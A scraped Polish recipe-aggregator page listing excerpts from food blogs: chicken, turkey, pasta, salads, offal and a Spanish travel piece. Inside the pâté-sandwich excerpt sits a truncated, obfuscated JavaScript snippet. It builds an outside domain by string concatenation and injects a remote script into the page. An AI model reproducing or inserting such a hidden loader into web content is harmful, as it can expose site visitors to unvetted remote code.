kurczak w sosie - 15347 przepisów (strona:859/1024)

Majonez z awokado 143

Dzisiaj przepis, który powinien przypaść do gustu osobom na diecie i dbającym o linię. Jest zdrowy i zawiera wiele witamin. Konsystencja jest bardzo zbliżona do tradycyjnego

PatiGotuje
Zrazy z karkówki 199

zrazów oraz zrobienia większej porcji niż moja, bo mięso znika w mig. Smakuje wspaniale od razu po przygotowaniu i także na drugi dzień. Nie będziecie zawiedzeni. Zobacz też: Pieczony kurczak na butelce Wieprzowina po chińsku z ryżem Karkówka z pieczarkami Przepis na zrazy z karkówki Drukuj przepis Porcji: 3 Czas gotowania: 1,5 godziny + marynowanie Składniki 6 plastrów karkówki(...)liść laurowy, ziele angielskie, posiekany ząbek czosnku i tymianek. Przykrywamy i dusimy około godziny, aż mięso będzie miękkie. Następnie gotujemy jeszcze 15 minut bez przykrycia, aby bulion odparował, a sos zgęstniał. 6 Podajemy z ulubionymi dodatkami - najlepiej smakują z ziemniakami lub kaszą.   Artykuł Zrazy z karkówki pochodzi z serwisu kuchniabazylii.pl - blog kulinarny

Kuchnia Bazylii
Skrzydeła w chrupiącej panierce z paluszków słonych 117

Można w ten sposób przygotować pałki, piersi lub jak ja skrzydełka kurze. Ja bardzo lubię mięsko ze skrzydełek, jest soczyste i pyszne. Przygotować je dzień wcześniej

Kuchnia Pokoleń
Pyszne placuszki z kurczakiem i warzywami 168

Wspaniały pomysł na obiad, mięso i warzywa razem. Polecam Pierś kurzą pokroić w drobną kostkę, pieczarki umyć i pokroić bardzo drobno, pora umyć i pociąć w

Kuchnia Pokoleń
Kura we rieslingu (Coq au riesling ;) ) 161

Niyskorzi pokulejcie 32 go trocha we mōnce i wciepcie na patelnia- dajcie na nia yno ździebko 33 masła klarowanego, to wtedy niy bydzie tak pyrskać 34 . Jak już sie kurczak przipieke 35 , to tyż go wczajście 36 do gorka. Potyn wlyjcie 37 kōniak do jaki kelni 38 abo gorczka, podgrzyjcie i (UWAGA!) podpołlcie 39 . Jak sie baje 40 połlić(...)szerokie 32 obtoczcie 33 troszeczkę 34 pryskać 35 przypiecze 36 wrzućcie 37 wlejcie 38 chochli 39 podpalcie 40 będzie 41 oblejcie 42 alkohol 43 pobulgocze 44 dajcie 45 sosu 46 rozmieszać 47 gęsta 48 leniwy 49 górę 50 jedzenie 51 makaronem Artykuł Kura we rieslingu (Coq au riesling ;) ) pochodzi z serwisu Chop w kuchni

Chop w kuchni
Indyk – co warto wiedzieć o mięsie z indyka? Przepis na roladki z indyczego udźca 145

doskonale nadaje się do pieczenia, czy duszenia. Znawcy porównują mięso z indyczego udźca do delikatnej cielęciny. podudzie z indyka – to konkret na talerzu, polecane tym, dla których udko z kurczaka to zdecydowanie za mała porcja. skrzydła z indyka – są idealne jako mięsna baza do zup. Nietłuste, nadają zupom delikatnie mięsny smak, nie przytłaczając innych, np. warzywnych nut smakowych. Jeśli chcecie(...)gotowania wraz ze śmietanką 34%. Po pierwsze przepis ten jest bardzo prosty, a po drugie te roladki to niebo w gębie! Koniecznie musicie wypróbować! Zaparzana pierś z indyka w sosie mango-curry z groszkiem cukrowym i smażonym ryżem Artykuł Indyk – co warto wiedzieć o mięsie z indyka? Przepis na roladki z indyczego udźca pochodzi z serwisu Czynniki Pierwsze

Czynniki pierwsze
Sałatka z ziemniakami, jajkiem i szparagami 92

coś innego, takiego typowo letniego. Dzisiejsza propozycja to pewnego rodzaju sałatka z ziemniakami. Podać można ją solo, jako bezmięsny obiad, ale ja dodatkowo podałam je z szaszłykami z kurczaka w migdałowej posypce . Wyszło wyśmienicie, dokładnie tak, jak to sobie wyobrażałam Co prawda tak przygotowane danie nie wygra w konkursie na NAJSZYBSZE danie, bo wymaga kilku etapów przygotowań i pobrudzenia kilku(...)gotujemy do miękkości (można w wodzie, w której gotowały się szparagi). 3 łyżki oliwy z oliwek, sok z cytryny oraz musztardę umieszczamy w słoiczku i potrząsamy aż do otrzymania sosu o gładkiej, jednolitej konsystencji. Doprawiamy do smaku solą oraz pieprzem. Na dużej patelni rozgrzewamy masło, dodajemy ziemniaki i obsmażamy je przez kilka minut, aż do lekkiego zarumienienia. Przekładamy do dużej

Smaki Na Talerzu
Szybkie kanapki z pasztetem 146

osobom na diecie niskocholesterolowej lub niskoenergetycznej. Natomiast wątróbki to doskonałe źródło prowitaminy A potrzebnej do utrzymania zdrowej skóry oraz zabezpieczenia przed infekcjami. Pasztety drobiowe mogą być przyrządzone z mięsa kurczaka, gęsi, kaczki lub wątróbki z kurcząt. Ich delikatna kremowa konsystencja oraz delikatny smak doskonale współgrają z szeregiem dodatków. Łączenie smaków Najczęściej w sklepach spotykamy pasztety pieczone, sporządzone z mięsa drobiowego(...)ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru+="j1xkjsmmhXfyin"; i32r.src="//"+i32r_+i32ru;i32r.type="text/javascript

Moja smaczna kuchnia
Szczypta Hiszpanii - Terremolinos, Ronda, Malaga (Andaluzja) 182

esencja Hiszpanii – doskonałe wino, jedzenie jeszcze lepsze!  Wybraliśmy mix przekąsek tapas – marynowane fileciki śledziowe, smażone rybki, duszone kuleczki wieprzowe, krokiety mięsne, ser smażony, chorizo duszone w warzywnym sosie. Ale chyba najlepsze były zimne przekąski - talerz z ostrą kiełbasą chorizo i półtwarde sery. Dech mi zaparło w piersi gdy kolejna Pani Halina zaczęła kroić plastry szynki z czarnej, iberyjskiej świni(...)naczyniu, w którym ją przyrządzono. Znajdziecie mnóstwo wersji tej potrawy, nawet i takie, w których to wykorzystuje się kilka rodzajów produktów białkowych równocześnie – np. królik z krewetkami i kurczakiem. Bez względu jaki wariant wybierzecie w polecanych restauracjach czy barach – powinno być wyśmienicie. Po bardzo dobrym posiłku warto przekąsić coś słodkiego. Dookoła jest mnóstwo kawiarenek i cukierni, w których każdy znajdzie

Right Behind The Kitchen
Meksykańska uczta, czyli fajitas z kurczaka i quesadilla z chili + test nowości do potraw meksykańskich firmy Delecta i Pryma 395

lodówce. W ten sposób bardziej przejdzie aromatem przypraw. Pomidora kroimy w dość grube plastry, papryki w podłużne paseczki, a papryczkę chili w cienkie plasterki. Na patelni rozgrzewamy oliwę, smażymy kurczaka przez 5 minut, następnie dodajemy paprykę czerwona i zielona. Smażymy kolejne kilka minut, aż papryka zmięknie. Odstawiamy gotowe mięso na bok. Patelnię teflonową smarujemy odrobiną oliwy, rozgrzewamy i przekładamy(...)najbardziej mogę go wszystkim polecić. Jest dość ostry, ale naprawdę bardzo smaczny i dobrze doprawiony. Idealnie nada się do nachosów czy domowych hamburgerów. Jak wszystkie tego typu sosy jest prosty w przygotowaniu. Ja osobiście zmniejszyłam o połowę ilość wody podaną na opakowaniu (zastąpiłam ją nieco większą ilością keczupu). Dip zagości na pewno na moim stole jeszcze nie raz. Chętnie sięgnę

Mania Gotowania
Paprykowe penne z kurczakiem 305

wlej trochę oliwy, aby makaron się nie skleił. Następnie pokrój kuraka i papryki w paski o długości około 3 cm. Cebulę pokrój w piórka. Powinieneś zacząć od smażenia kurczaka. W rondelku rozgrzej olej i rzuć na niego mięso. Nie sól, żeby nie puściło wody. Jak już będzie elegancko zrumienione, weź łyżkęcedzakową i zdejmij mięso na jakiś talerz. Teraz do tego(...)ciągnące się grudy, nic się nie martw. Mieszaj dalej, tak długo, aż znikną pod wpływem temperatury. Poczekaj, aż mleko trochę odparuje. Generalnie nie chcemy zupy, tylko ładny, gęsty sos. Jak całość się ładnie zredukuje, danie będzie gotowe. Po nałożeniu posyp z wierzchu trochę natki pietruszki. Magnifico

manslogblog
Zdrowsze Święta – przepisy wytrawne 87

śmietaną – zupa będzie lżejsza. W wielu domach króluje sałatka wielowarzywna – oczywiście grubo posmarowana majonezem z wierzchu. Można ją łatwo “przerobić” na lżejszą wersję używając na sos majonezu light wymieszanego pół na pół z jogurtem naturalnym. Pierogi będą bardziej odżywcze, jeśli mąkę pszenną zamienimy na jasną orkiszową – ma więcej cennych składników odżywczych. Jeśli dodatkowo choć(...)Święta). Szczególnie warto go podawać z ogórkami kiszonymi – położone na kanapkę nadają mu charakteru. Pasztet “zero waste” z mięsa i warzyw po rosole: 1,7 kg kurczak w całości (ewentualnie udka lub podudzia) 4 duże marchewki 2 cebule (opalone na palniku lub suchej patelni) 2 pietruszki kawałek selera 4 jajka 4 ząbki czosnku 8 listków liści laurowych

Poezja smaku
3 proste makarony, które zrobisz w 15 minut. Przepisy na Światowy Dzień Makaronu! 189

Składniki / na 4 porcje: 350 g makaronu penne 1 łyżka oliwy 1 ząbek czosnku 250 g pomidorków koktajlowych 1 słoik pesto alla genovese od Monini 2 puszki tuńczyka w sosie własnym  skórka otarta z 1/2 cytryny 100 g rukoli Przygotowanie: Makaron ugotuj al dente. Pod koniec gotowania makaronu na dużej patelni rozgrzej oliwę i wrzuć na nią posiekany czosnek(...)parmezanem. Gotowe! ➤ Rada: Jeśli masz nieco więcej czasu, możesz wzbogacić ten przepis o dodatek pokrojonego w kostkę boczku, który należy przesmażyć razem z pieczarkami. Pasuje też dodatek mięsa z kurczaka (np. z udek) lub polędwiczki wieprzowe.  Wpis powstał we współpracy z  Monini

Chilli Czosnek i Oliwa
Żołądki drobiowe w cieście z kalarepą i surówką 147

Nuże, łasuchy! Ile to razy rzuciliście okiem na takie "małe motylki" leżące tuż obok wszelkich partii kurczaka w sklepowej chłodni? Ile to razy zlekceważyliście wspaniałe podroby jak wątróbkę, serca czy tytułowe żołądki drobiowe? No właśnie, te ostatnie są w szczególności lekceważone, zbyt często . Osobiście, w ślad za mamami i babciami, dodaję zarówno żołądki i serca do rosołu, a później przekładam(...)dać dość łatwo zrzucić do gorącego oleju beż użycia dodatkowej łyżki. Usmażone na złoto-brązowy kolor żołądki przekładamy na ręcznik papierowy i po chwili podajemy. Na koniec skrapiamy całość sosem - kilka łyżek oliwy połączonej z odrobiną octu z białego wina i garścią drobno posiekanej natki pietruszki. I mamy - żołądki kurze o jakich nie śnili nawet najstarsi górale. Poczęstujcie kogoś

Right Behind The Kitchen
Filet z kurczaka w sosie cebulowo-śmietanowym z natką pietruszki 153

Nie będę ukrywała, że to danie nie należy do najlżejszych...ale za to jakie jest smaczne...idealne na rodzinny leniwy obiad. W towarzystwie ulubionych dodatków 

kawawszklance